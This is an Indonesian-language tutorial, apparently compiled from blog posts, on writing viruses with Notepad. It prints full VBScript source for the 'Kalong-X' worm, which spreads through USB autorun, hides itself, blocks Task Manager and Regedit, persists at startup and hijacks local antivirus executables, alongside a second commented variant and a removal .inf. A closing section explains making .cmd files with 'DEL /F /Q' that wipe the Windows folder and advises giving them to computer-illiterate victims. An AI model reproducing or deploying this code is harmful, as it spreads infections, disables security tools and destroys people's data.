isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6ms32.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘buat file induk
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs “)
tf.attributes = 32
set tf = fs.createtextfile(windowpath & “\k4l0n6-x.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & “\k4l0n6-x.dll.vbs”)
tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in fs.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then

set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(desades.path &”\k4l0n6ms32.dll.vbs”,2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &”\k4l0n6ms32.dll.vbs”)
tf.attributes = 39

set tf =fs.getfile(desades.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(desades.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)

‘Ubah IE Title
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: ->KALONG-X<- ::”

‘File Hidden tak terlihat
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

‘Blokir Find, FolderOptions, Run, Regedit, Task Manager, dan klik kanan
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘Buat pesan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “THE KALONG-X”
kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”,”No reason for Panic”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs”

‘Alihkan aplikasi berikut. Jika dibuka maka program terbuka dengan Notepad
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”notepad.exe”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”notepad.exe”

‘Bonus
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

Setelah Anda menempatkan kode tersebut klik FILE > SAVE. Di File Type pilih ALL FILES (*.*) lalu simpan dengan nama k4l0n6ms32.dll.vbs. Setelah itu coba Anda jalankan. Dan ya, Anda telah menjalankan KALONG-X.VBS di komputer Anda.
Jika Anda membuka aplikasi yang bernama : cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, dan PCMAV-RTP.exe maka akan terbuka Notepad yang isinya kurang lebih mirip seperti ini :



Ingat jadilah orang yang bermanfaat bagi orang lain. Tidak ada “barang berbahaya” disini karena Andalah yang membuatnya berbahaya. Saya tidak bertanggung jawab apabila Anda menyalahgunakan kode ini. Ini untuk ilmu pengetahuan semata. Kalau disalahgunakan saya kutuk mukanya mirip Tukul (Wah…jadi terkenal nanti)…jangan deh. Pokoknya segala kenekatan Anda ditanggung oleh Anda sendiri.
Virus ini punya kemampuan Autorun jadi komputer yang dicolokkan Removable Disc (Mislanya Flash Disc) yang terinfeksi virus ini akan diinfeksi pula (jika Autorun tidak di non-aktifkan)
NOTE: Untuk membersihkan Kalong-X caranya mudah. Tinggal hentikan proses yang bernama wscript.exe. Jika di WinNT Anda bisa melakukannya lewat Task Manager. Tapi kalau Win9X silahkan cari tool pengganti Task Manager misalnya Procexp atau CurrProcess. Soalnya terkadang kalau lewat perintah Command Prompt gak bisa.
Setelah Anda memberhentikan proses wscript.exe hapus file induk yang bernama k4l0n6-x.dll.vbs di WINDOWSDIR (C:\Windows misalnya). Jika tidak ada tampilkan dulu file hidden dengan Folder Options. Setelah itu perbaiki Registry. Untuk mempercepat salin kode ini ke Notepad :
[Version]
Signature=”$Chicago$”
Provider=Fariskhi

[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del

[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, “INTERNET EXPLORER”

[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger

Setelah itu save dengan FILE TYPE : ALL FILES (*.*) dan simpan dengan nama : kalongxremoval.inf. Setelah itu klik kanan file tersebut dan pilih install. Jadi kita buat Virus dan Antidotnya sama-sama dengan Notepad.

Virus dengan Notepad

Iseng-iseng mencolok link orang saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.Sesua janji saya, kita akan membuat virus yang sederhana menggunakan Notepad. Virus ini akan membuat dirinya menyebar ke removable disc dengan AutoRun sehingga komputer lain yang tercolok flash disc terinfeksi akan langsung menjadi korban tanpa menungu User menjalankan infector-nya. Virus ini saya beri nama “Kalong.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalau kode dibawah ini saya nggak tau, tolong Mas Aat_S untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

Save code di Notepad dengan cara FILE > SAVE. Lalu di save as type pilih “All Files (*.*). Simpan dengan nama : k4l0n6.dll.vbs. Sebenarnya gak usah pake *.dll juga gak apa-apa tapi usaha agar tidak mencurigakan aja.

He..he…Virus Worm ini memang bukan murni dari pemikiran saya sendiri karena meniru kode-nya virus Rangga-Zay. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.

Cara Nggawe Virus

Untuk men-delete semua file/folder, anda cuma perlu melakukan ini:
DEL /F /Q *Ketik/copy tulisan tsb Di notepad, kemudian save menjadi *.cmd
(ex:antivirus.cmd)Itu akan men-delete semua data yg ada di komputer walaupun itu file/folder read-only dan anda tidak akan diberi konfirmasi untuk melakukan hal itu. Anda tidak akan bisa melakukan apapun jika anda sudah meng-klik file cmd tsb.

PERINGATAN: JANGAN PERNAH SEKALI-KALI ANDA MENCOBA MENG-KLIK JIKA ANDA TELAH MENCIPTAKANNYA, ITU AKAN MERUSAK KOMPUTER ANDA SENDIRI

Jika anda ingin mencoba virus ini, lakukan ini:


Pertama, buat text file bernama TEST.txt di C:\
Selanjutnya, buka notepad, tulis “del C:\TEST.txt” (tanpa tanda quota/”), lalu “Save As…” dan save dengan nama “Percobaan.cmd”(Juga tanpa tanda quota/”)
Berikutnya, klik Percobaan.cmd tadi dan buka drive C:\ anda dan anda akan melihat file TEST.txt anda menghilang

Petunjuk yg simpel:
Buka notepad, tulis DEL /F /Q C:\WINDOWS (kalo anda orang yg tidak terlalu kejam, hapus windowsnya aja, kasian korbannya), kemudian save dengan nama *.cmd (namanya terserah anda, yg penting formatnya .cmd), lalu berikan ini kepada korban yg anda inginkan. Sekali korban membuka/meng-klik file ini, maka WINDOWSnya akan hilang dan dia harus meng-install WINDOWSnya lagi. Dijamin, datanya ilang semua karena dia harus install ulang WINDOWSnya (kalo kita install windows kan datanya terhapus smua, kecuali dia emang ahli komputer, tapi kan pasti kita kasih ni virus sama orang2 yg rada2 gaptech, jd dia ga bs bedain ini virus ato nggak. So, dia asal klik aja deh).

PERINGATAN: INI ADALAH VIRUS YANG SANGAT KUAT, SAYA TIDAK BISA MENJAMIN KEAMANAN ANDA JIKA ANDA MENCOBA MEMBUKA/MENG-KLIK VIRUS INI PADA KOMPUTER ANDA SENDIRI